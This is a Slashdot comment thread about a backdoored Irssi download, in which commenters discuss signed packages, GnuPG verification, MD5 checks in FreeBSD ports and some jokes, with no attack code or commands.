JAR files use a certificate chain ending in a certificate authority (usually a commercial one) but maybe the signed-download scheme could be signed against a certificate on the official developer's website. Of course that wouldn't be unspoofable, but it would be as secure as the current scheme of having a PGP public key on the developer website and signing against that. The main benefit is the checking would happen automatically, so it would be much harder to put crap into downloads. If someone makes a modified version, they would have to sign it themselves (with a signature pointing back to their own website) or else the unpacker would print a message saying the code was unsigned and the user should check it carefully before using it.

Re:GNU/Linux needs signed downloads (3, Informative)

bogado (25959) | more than 11 years ago | (#3807139)

RPM does this, and most rpm managers do exactly this (red-carpet for instance). I bet debian has the same type of protection. If you only install software from trusted distributors, you should be fine.

Re:GNU/Linux needs signed downloads (1)

jeffy124 (453342) | more than 11 years ago | (#3807142)

actually, JAR files are a Sun thing, not Netscape or MS. It stands for Java ARchive. But your point is correct - signed archives are a good thing. IIRC, MS does something like this within Windows Update when you patch your box.

Enough talk (3, Funny)

WildBeast (189336) | more than 11 years ago | (#3807138)

Grow up, nothing is perfectly secure. Let's stop arguing which OS is vulnerable and find the evil do-ers who did this. Let's smoke them out from there parents basement and deliver a Slashdot can of whoop ass.

Jesus, I'm so dumb (-1, Offtopic)

ellem (147712) | more than 11 years ago | (#3807162)

I can't even find the front door...

Fortunately a window on the West side of the house is ajar... to the East the mountains are impassable.

HA HA HA HA HA (1, Interesting)

Anonymous Coward | more than 11 years ago | (#3807164)

. . .What separates Irssi from ircII, BitchX, epic and the rest text clients? The code. I'm not using the crappy ugly kludgy code of ircII. Non-developers don't probably care that much about it, but that means a few good things anyway:

Security - I'm quite confident that there's no security bugs in Irssi. No buffer overflows, no format bugs (%s%s%s), no remote exploits, nothing.

Modularity - Irssi is highly extensible, you could change almost anything in Irssi with a runtime loadable module. And you can probably change anything you actually need to change with a Perl script.

FreeBSD port (0)

Anonymous Coward | more than 11 years ago | (#3807166)

Its a wonder that this was not noticed quicker due to the FreeBSD ports system having the md5 hash for the good copy. I would think that grabbing the bad copy and having a md5 mismatch would raise some questions... I wonder how long its been sending out bad copies. I guess fetch was allowed to get the correct one.

Ain't that a Bitch ...X (-1)

Anonymous Coward | more than 11 years ago | (#3807167)

I such a wit..... ok a half wit

If you were using a Trusted Computing machine . . (5, Funny)

vegetablespork (575101) | more than 11 years ago | (#3807182)

. . . you wouldn't be vulnerable to back doors inserted by rogue programmers in configure scripts. You would only be vulnerable to back doors authorized by Microsoft and the U.S. Government to prevent piracy and terrorism.

GnuPG (2, Insightful)

giminy (94188) | more than 11 years ago | (#3807194)

If more people used GnuPG [gnupg.org] and checked the signatures on their software, we wouldn't have to worry as much about backdoored software (assuming, of course, that you trust the original author. And if you don't, then you shouldn't be using their software now should you?). One of these days someone is going to do something like this with something major, like the kernel, and it's going to affect a lot of people. So start checking now!
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...